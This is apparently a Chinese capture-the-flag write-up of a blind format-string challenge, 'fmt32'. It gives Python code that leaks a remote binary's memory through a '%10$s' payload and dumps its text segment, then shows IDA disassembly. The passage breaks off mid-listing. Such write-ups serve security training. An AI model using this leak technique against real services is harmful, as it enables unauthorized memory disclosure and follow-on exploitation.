出题人好像比较喜欢blind pwn,5道pwn题里有3个,由于时间关系来不及看rop64了(我太菜)。
1.fmt32
只给了ip&port,没有附件猜测是blind pwn,根据题目名字,猜想有格式化字符串漏洞,试了一下发现是一个循环(毕竟是复读机),每次都可以利用格式化字符串漏洞,于是首先想法是先将内存dump下来再分析,如果32位程序没开pie保护,程序首地址为0x8048000。
def leak(addr):
payload = "%10$s.TMP" + p32(addr)
io.sendline(payload)
print "leaking:", hex(addr)
io.recvuntil('Repeater:')
resp = io.recvuntil(".TMP")
ret = resp[:-4:]
print ret, len(ret)
remain = io.recvrepeat(0.2)
return ret
start_addr = 0x8048000
#leak(0x8048000)
text_seg = ''
try:
while True:
ret = leak(start_addr)
text_seg += ret
start_addr += len(ret)
if start_addr>=0x8048b00:
break
if len(ret) == 0:
start_addr += 1
text_seg += '\x00'
except Exception as e:
print e
print '[+]', len(text_seg)
with open('dump_bin', 'wb') as f:
f.write(text_seg)
代码段差不多到0x8048b00就结束了,跑完之后放到ida中,找到代码段,下面应该是main函数,根据远程服务器的返回以及流程猜测对应函数吧。
seg000:08048605 push ebp
seg000:08048606 mov ebp, esp
seg000:08048608 push ecx
seg000:08048609 sub esp, 244h
seg000:0804860F mov eax, large gs:14h
seg000:08048615 mov [ebp-0Ch], eax
seg000:08048618 xor eax, eax
seg000:0804861A mov eax, ds:804A064h
seg000:0804861F sub esp, 8
seg000:08048622 push 0
seg000:08048624 push eax
seg000:08048625 call sub_8048450
seg000:0804862A add esp, 10h
seg000:0804862D mov eax, ds:804A060h
seg000:08048632 sub esp, 8
seg000:08048635 push 0
seg000:08048637 push eax
seg000:08048638 call sub_8048450
seg000:0804863D add esp, 10h
seg000:08048640 mov eax, ds:804A040h
seg000:08048645 sub esp, 8
seg000:08048648 push 0
seg000:0804864A push eax
seg000:0804864B call sub_8048450
seg000:08048650 add esp, 10h
seg000:08048653 sub esp, 0Ch
seg000:08048656 push 80487E0h
seg000:0804865B call sub_8048490
seg000:08048660 add esp, 10h
seg000:08048663 sub esp, 0Ch
seg000:08048666 push 804885Ch
seg000:0804866B call sub_8048490
seg000:08048670 add esp, 10h
seg000:08048673 mov dword ptr [ebp-240h], 0
seg000:0804867D
seg000:0804867D loc_804867D: ;循环
seg000:0804867D sub esp, 0Ch
seg000:08048680 push 3
seg000